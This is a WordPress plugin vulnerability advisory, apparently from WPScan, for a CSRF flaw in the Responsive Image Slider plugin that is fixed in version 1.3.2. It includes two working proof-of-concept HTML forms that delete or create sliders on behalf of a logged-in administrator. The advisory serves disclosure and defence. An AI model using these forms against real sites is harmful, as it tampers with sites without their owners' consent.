WordPress Plugin Vulnerabilities
Responsive Image Slider, Photo Gallery And Carousel < 1.3.2 - Slider Clone/Save/Delete via CSRF
Description
The plugin has a logic flaw in its CSRF checks in the sf_clone_slider, sf_save_slider and sf_remove_slider AJAX actions, which could allow an attacker to make a logged in user call them via a CSRF attack.
Proof of Concept
To delete a slider:
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="sf_remove_slider" />
<input type="hidden" name="do_action" value="single" />
<input type="hidden" name="sf_slider_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
To create a slider
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="sf_save_slider" />
<input type="hidden" name="sf_slider_id" value="1" />
<input type="hidden" name="sf_slider_layout" value="1" />
<input type="hidden" name="sf_slider_title" value="CSRF" />
<input type="hidden" name="sf_slide_ids" value="" />
<input type="hidden" name="sf_slide_titles" value="" />
<input type="hidden" name="sf_slide_descs" value="" />
<input type="hidden" name="sf_1_width" value="100%" />
<input type="hidden" name="sf_1_height" value="100%" />
<input type="hidden" name="sf_1_auto_play" value="true" />
<input type="hidden" name="sf_1_sorting" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in 1.3.2 Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2021-10-18 (about 2 years ago)
WPScan 